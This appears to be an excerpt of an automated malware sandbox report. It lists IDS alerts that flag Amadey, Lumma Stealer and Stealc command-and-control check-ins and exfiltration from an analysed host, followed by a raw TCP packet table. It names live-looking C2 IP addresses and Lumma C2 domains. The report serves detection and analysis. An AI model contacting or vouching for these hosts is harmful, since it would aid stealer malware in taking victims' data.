2024-12-15T00:03:24.669548+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	50264	185.215.113.43	80	TCP
2024-12-15T00:03:52.208123+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50277	TCP
2024-12-15T00:03:54.863552+0100	2058230	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz)	1	192.168.2.4	58162	1.1.1.1	53	UDP
2024-12-15T00:03:56.261972+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:56.261972+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:57.255734+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50281	185.215.113.43	80	TCP
2024-12-15T00:03:57.259790+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:57.259790+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50279	104.21.50.161	443	TCP
2024-12-15T00:03:57.266580+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	58616	1.1.1.1	53	UDP
2024-12-15T00:03:58.633662+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:03:58.633662+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:03:59.366929+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:03:59.366929+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50283	172.67.207.38	443	TCP
2024-12-15T00:03:59.392564+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	62393	1.1.1.1	53	UDP
2024-12-15T00:04:00.768298+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:00.768298+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:01.497046+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:01.497046+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50284	104.21.64.1	443	TCP
2024-12-15T00:04:01.507392+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	49699	1.1.1.1	53	UDP
2024-12-15T00:04:01.524484+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50285	185.215.113.206	80	TCP
2024-12-15T00:04:01.651374+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	54758	1.1.1.1	53	UDP
2024-12-15T00:04:01.794865+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	51171	1.1.1.1	53	UDP
2024-12-15T00:04:01.942157+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	58282	1.1.1.1	53	UDP
2024-12-15T00:04:02.085051+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	62332	1.1.1.1	53	UDP
2024-12-15T00:04:02.233334+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	64149	1.1.1.1	53	UDP
2024-12-15T00:04:02.480192+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50286	185.215.113.43	80	TCP
2024-12-15T00:04:03.981074+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50288	104.102.49.254	443	TCP
2024-12-15T00:04:04.770008+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50288	104.102.49.254	443	TCP
2024-12-15T00:04:07.680405+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50290	185.215.113.43	80	TCP
2024-12-15T00:04:11.990818+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:11.990818+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:12.738313+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:12.738313+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50295	104.21.50.161	443	TCP
2024-12-15T00:04:12.938884+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50296	185.215.113.43	80	TCP
2024-12-15T00:04:13.975696+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:13.975696+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:14.984535+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:14.984535+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50297	172.67.207.38	443	TCP
2024-12-15T00:04:16.222029+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:16.222029+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:16.920865+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:16.920865+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50299	104.21.64.1	443	TCP
2024-12-15T00:04:16.928521+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	53059	1.1.1.1	53	UDP
2024-12-15T00:04:17.073030+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	58933	1.1.1.1	53	UDP
2024-12-15T00:04:17.217114+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	52440	1.1.1.1	53	UDP
2024-12-15T00:04:17.362205+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	51277	1.1.1.1	53	UDP
2024-12-15T00:04:17.505011+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	59367	1.1.1.1	53	UDP
2024-12-15T00:04:17.646810+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	54998	1.1.1.1	53	UDP
2024-12-15T00:04:19.246149+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50302	104.102.49.254	443	TCP
2024-12-15T00:04:20.054282+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50302	104.102.49.254	443	TCP
2024-12-15T00:04:21.208460+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50303	185.215.113.206	80	TCP
2024-12-15T00:04:46.771543+0100	2058231	ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI)	1	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:46.771543+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:47.503677+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:47.503677+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50316	104.21.50.161	443	TCP
2024-12-15T00:04:48.731130+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:48.731130+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:49.467951+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:49.467951+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50318	172.67.207.38	443	TCP
2024-12-15T00:04:50.698185+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	50320	104.21.64.1	443	TCP
2024-12-15T00:04:50.698185+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50320	104.21.64.1	443	TCP
2024-12-15T00:04:51.443850+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50320	104.21.64.1	443	TCP
2024-12-15T00:04:51.443850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50320	104.21.64.1	443	TCP
2024-12-15T00:04:51.449698+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	61944	1.1.1.1	53	UDP
2024-12-15T00:04:51.593182+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	58769	1.1.1.1	53	UDP
2024-12-15T00:04:51.732125+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	54050	1.1.1.1	53	UDP
2024-12-15T00:04:51.875013+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	50685	1.1.1.1	53	UDP
2024-12-15T00:04:52.017342+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	55200	1.1.1.1	53	UDP
2024-12-15T00:04:52.161087+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	64162	1.1.1.1	53	UDP
2024-12-15T00:04:53.919967+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50322	104.102.49.254	443	TCP
2024-12-15T00:04:54.697439+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	50322	104.102.49.254	443	TCP
2024-12-15T00:04:55.881241+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50324	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 23:57:05.143883944 CET	49675	443	192.168.2.4	173.222.162.32
Dec 14, 2024 23:57:18.665703058 CET	80	49723	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:18.669472933 CET	49723	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:18.670018911 CET	49723	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:18.789948940 CET	80	49723	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:32.676861048 CET	80	49724	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:32.677443027 CET	49724	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:32.677443981 CET	49724	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:32.987777948 CET	49724	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:33.160263062 CET	80	49724	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:33.160348892 CET	80	49724	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:33.160377979 CET	80	49724	217.20.58.101	192.168.2.4
Dec 14, 2024 23:57:33.160425901 CET	49724	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:57:33.160506964 CET	49724	80	192.168.2.4	217.20.58.101
Dec 14, 2024 23:58:04.451145887 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:04.571121931 CET	80	49758	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:04.573570013 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:04.586390972 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:04.706187010 CET	80	49758	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:05.921753883 CET	80	49758	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:05.925421953 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.441353083 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.441721916 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.561870098 CET	80	49764	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:07.561909914 CET	80	49758	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:07.562285900 CET	49758	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.562462091 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.562462091 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:07.682574987 CET	80	49764	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:08.931937933 CET	80	49764	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:08.932322025 CET	49764	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:08.935878992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:09.056232929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:09.056318998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:09.056471109 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:09.176995039 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385174990 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385250092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.385348082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385386944 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385396957 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.385457039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.385741949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385790110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.385791063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385828018 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.385840893 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.385917902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.386426926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.386461020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.386476040 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.386493921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.386507988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.386549950 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.386883020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.386930943 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.505307913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.505352974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.505386114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.505422115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.509486914 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.509577036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.585021973 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.585063934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.585128069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.585158110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.588999033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.589076042 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.589167118 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.597481966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.597539902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.597620964 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.597681046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.605933905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.605994940 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.606071949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.606125116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.614319086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.614367962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.614449024 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.614506960 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.622936010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.622971058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.623179913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.631232977 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.631304026 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.631381989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.631439924 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.639678001 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.639730930 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.639851093 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.639906883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.648190022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.648253918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.648256063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.648305893 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.655831099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.655888081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.655916929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.655970097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.663422108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.663472891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.663547039 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.663599968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.705048084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.705200911 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.705267906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.705328941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.776874065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.776948929 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.776977062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.777024031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.779360056 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.779412031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.780281067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.780332088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.780420065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.780471087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.785413980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.785468102 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.785542011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.785583019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.790610075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.790662050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.790695906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.790750980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.795646906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.795715094 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.795790911 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.795845985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.800843954 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.800909042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.800945044 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.801000118 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.805962086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.806022882 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.806025028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.806078911 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.811103106 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.811156034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.811167955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.811208963 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.816267967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.816343069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.816346884 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.816391945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.821335077 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.821412086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.821491003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.821557045 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.826435089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.826493025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.826565981 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.826622009 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.831551075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.831602097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.831629992 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.831682920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.836731911 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.836781025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.836855888 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.836901903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.840327978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.840372086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.840472937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.840519905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.843996048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.844043970 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.844118118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.844162941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.847632885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.847683907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.847771883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.847817898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.851366997 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.851418018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.969084978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.969110012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.969191074 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.970463991 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.970515966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.970612049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.970662117 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.973620892 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.973671913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.974721909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.974771976 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.974786997 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.974848032 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.977616072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.977679014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.977742910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.977797031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.980627060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.980679989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.980756044 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.980808020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:10.983665943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:10.983717918 CET	49770	80	192.168.2.4	31.41.244.11
